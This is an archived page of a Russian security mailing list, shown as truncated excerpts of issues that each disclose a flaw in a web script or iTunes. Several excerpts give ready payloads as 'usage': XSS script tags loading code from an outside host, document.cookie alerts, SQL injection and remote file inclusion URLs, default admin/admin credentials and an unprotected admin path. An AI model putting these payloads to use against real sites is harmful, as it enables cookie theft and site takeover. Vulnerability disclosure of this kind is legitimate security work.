Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
| ← Август 2025 | ||||||
|
1
|
2
|
3
|
||||
|---|---|---|---|---|---|---|
|
4
|
5
|
6
|
7
|
8
|
9
|
10
|
|
11
|
12
|
13
|
14
|
15
|
16
|
17
|
|
18
|
19
|
20
|
21
|
22
|
23
|
24
|
|
25
|
26
|
27
|
28
|
29
|
30
|
31
|
В наше время взломы сайтов, форумом и чатов стали привычном делом. Для тех кто хочет знать почему это происходит и как этому противостоять и существует наша рассылка.
Статистика
-1 за неделю
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в mAds.
Компьютер для продвинутых пользователей В этом выпуске: mAds ПО: mAds Версия: 1.0 Сайт: http://lowpricescripts.com/product_info.php?products_id=51 Уязвимость: Возможна XSS-атака, когда поиск mAds возвращает результат с динамическим результатом на экране, этот запрос не фильтруется. Использование: В поле поиска введите любой скрипт-код, например, <script src=http://www.youfucktard.com/xss.js></script. Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пер...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Buddy Zone .
Компьютер для продвинутых пользователей В этом выпуске: Buddy Zone ПО: Buddy Zone Версия: 1.0.1 Сайт: http://www.vastal.com/buddy-zone-social-networking-script.html Уязвимость : Данные во многих полях не проверяются до их выполнения. Например, в полях имя, фамилия, ваш город и так далее вставив <script>alert(document.cookie)</script> вы можете наблюдать выполнение вашего кода. Использование: Вставьте в любое поле script-код. Например, <script>alert(document.cookie)</script> . Не забудьте прогол...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в MyNewsGroups.
Компьютер для продвинутых пользователей В этом выпуске: MyNewsGroups ПО: MyNewsGroups Версия: 0.6 Использование: /newsgroups/tree.php?grp_id[SQL] Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в iTunes.
Компьютер для продвинутых пользователей В этом выпуске: iTunes ПО: iTunes Уязвимость: Данная уязвимость позволяет атакующему выполнить любой код на устройстве с установленным программным обеспечением Apple iTunes. Эксплуатация представляет собой необходимость атакующего заставить открыть пользователя подготовленного медиа-листа. Уязвимость заключается в специфических точках выхода, появляющиеся в течение выполнения специально подготовленных AAC-медиа файлов - таких как листы с расширением .M4A и .M4P. Для ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в AzDGDatingPlatinum.
Компьютер для продвинутых пользователей В этом выпуске: AzDGDatingPlatinum ПО: AzDGDatingPlatinum Версия: 1.1.0 Пример использования: /gentemsn/view.php?l=ar...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в MF Piadas.
Компьютер для продвинутых пользователей В этом выпуске: MF Piadas ПО: MF Piadas Версия: 1.0 Сайт: http://www.mastersfusion.com.br Пример использования: username : admin password : admin http://www.site.com/[scriptpath]/admin/admin.php?page=yourcode.txt?...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Usenet Script.
Компьютер для продвинутых пользователей В этом выпуске: Usenet Script ПО: Usenet Script Версия: 0.5 О Usenet Script: Срипт новостей использующий SQL базу данных. При разработке использовались базы данных Postgresql, но она использует dbx и должна, поэтому работать в других системах баз данных. Описание: В файле index.php не проверяется переменная group, что позволяет применить XSS-атаку, вставив JavaSciript код. Пример использования: http://www.example.com/index.php?group=<script src=http://www.youfuckt...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Winged Gallery.
Компьютер для продвинутых пользователей В этом выпуске: Winged Gallery ПО: Winged Gallery Версия: 1.0 Пример использования: http://example.com/gallery/thumb.php?image=data/Example+Folder/firefox+icon.jpg><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT> > Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Open Guestbook.
Компьютер для продвинутых пользователей В этом выпуске: Open Guestbook ПО: Open Guestbook Версия: 0.15 Описание: В продукте есть возможность провести XSS атаку. Уязвимый код в файле header.php: [1] <html> [2] [3] <head> [4] [5] <title><? echo $title"; ?></title> Есть возможность провести SQL-инъекцию. Уязвимый код в файле view.php: [23] if (empty$offset) { [24] $offset=0; [25] } [26] [27] // get results [28] $result=mysql_query"SELECT * FROM $tentries ORDER BY ID DESC limit $o...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Planetnews.
Компьютер для продвинутых пользователей В этом выпуске: Planetnews ПО: Planetnews Версия: n/a Сайт: http://www.planetc.de Описание: Перейдя по пути "admin/planetnews.php, мы получаем возможность добавлять или удалять новости, а так же закачивать на сервер файлы. Пример использования: http://www.site.com/news/admin/planetnews.php Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...
